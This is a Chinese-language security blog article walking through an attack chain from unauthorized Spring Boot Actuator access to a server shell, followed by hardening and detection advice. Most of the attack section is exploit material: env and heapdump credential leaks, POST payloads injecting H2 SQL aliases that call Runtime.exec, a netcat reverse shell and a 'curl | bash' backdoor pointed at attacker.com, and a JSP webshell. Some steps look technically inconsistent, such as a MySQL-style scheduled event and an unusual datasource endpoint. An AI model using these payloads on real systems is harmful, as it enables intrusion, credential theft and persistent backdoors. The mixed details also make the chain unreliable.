您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# Spring Boot Actuator从未授权访问到getshell的示例分析
## 0x00 前言
Spring Boot Actuator是Spring Boot提供的生产级功能模块,用于监控和管理应用程序。然而当配置不当时,其暴露的敏感端点可能成为攻击者突破系统防线的入口。本文将通过一个完整的渗透测试案例,详细分析如何从Actuator未授权访问漏洞逐步获取服务器权限。
## 0x01 漏洞背景
### 1.1 Actuator端点简介
Spring Boot Actuator默认提供以下关键端点(部分):
```plaintext
/actuator/health - 应用健康状态
/actuator/env - 环境变量信息
/actuator/beans - 所有Spring Beans
/actuator/mappings - URL路由映射
/actuator/heapdump - 堆内存转储
导致漏洞的典型配置:
# application.yml错误配置示例
management:
endpoints:
web:
exposure:
include: "*" # 暴露所有端点
endpoint:
health:
show-details: always
使用自动化工具扫描发现可疑端点:
$ curl http://target.com/actuator
{
"_links":{
"env":{"href":"/actuator/env"},
"heapdump":{"href":"/actuator/heapdump"},
"mappings":{"href":"/actuator/mappings"}
}
}
访问env端点获取关键配置:
$ curl http://target.com/actuator/env
{
"activeProfiles":["prod"],
"propertySources":[
{
"name":"systemEnvironment",
"properties":{
"DATABASE_PASSWORD":{"value":"P@ssw0rd123!"},
"API_KEY":{"value":"sk_live_abcdef123456"}
}
}
]
}
wget http://target.com/actuator/heapdump -O memory.hprof
// 发现数据库连接池中的明文密码
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
-> connectionProperties = {user=admin, password=Admin@123}
通过env端点修改运行时配置:
POST /actuator/env HTTP/1.1
Content-Type: application/json
{
"name":"spring.datasource.tomcat.validation-query",
"value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \"success\";}';"
}
POST /actuator/refresh HTTP/1.1
GET /actuator/datasource?query=EXEC('nc+-e+/bin/bash+attacker.com+4444') HTTP/1.1
利用H2数据库的SQL注入特性:
CREATE TABLE shell(
id int primary key,
content varchar(255)
AS VALUES(1, '<%@page import="java.util.*,java.io.*"%><% if(request.getParameter("cmd")!=null){Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while((line=br.readLine())!=null){out.println(line);}}%>')
通过cron表达式注入:
POST /actuator/env HTTP/1.1
Content-Type: application/json
{
"name":"spring.datasource.hikari.connection-init-sql",
"value":"CREATE EVENT IF NOT EXISTS backdoor ON SCHEDULE EVERY 1 MINUTE DO CALL EXEC('curl http://attacker.com/shell.sh | bash')"
}
management:
endpoints:
web:
exposure:
include: health,info # 仅开放必要端点
base-path: /internal # 修改默认路径
endpoint:
shutdown:
enabled: false
@Configuration
public class ActuatorSecurity extends WebSecurityConfigurerAdapter {
@Override
protected void configure(HttpSecurity http) throws Exception {
http.requestMatcher(EndpointRequest.toAnyEndpoint())
.authorizeRequests().anyRequest().hasRole("ADMIN")
.and().httpBasic();
}
}
location ~ ^/actuator {
allow 192.168.1.0/24;
deny all;
auth_basic "Restricted";
auth_basic_user_file /etc/nginx/.htpasswd;
}
需监控的恶意请求模式:
- 高频访问/actuator/env端点
- POST请求修改运行时配置
- 非常规User-Agent扫描行为
2023-07-15 14:32:17 WARN o.s.b.a.e.web.EndpointLinksResolver - Potential malicious access attempt from 45.33.12.8 to /actuator/heapdump
2023-07-15 14:33:45 ERROR o.a.c.c.C.[.[.[/].[dispatcherServlet] - Servlet.service() for servlet [dispatcherServlet] threw exception: org.springframework.security.authentication.BadCredentialsException
// 安全启动检查示例
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication app = new SpringApplication(Application.class);
app.setAddCommandLineProperties(false); // 禁止命令行参数覆盖
app.run(args);
}
}
”`
注:本文所述技术仅供安全研究使用,请勿用于非法用途。实际测试前务必获得书面授权。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。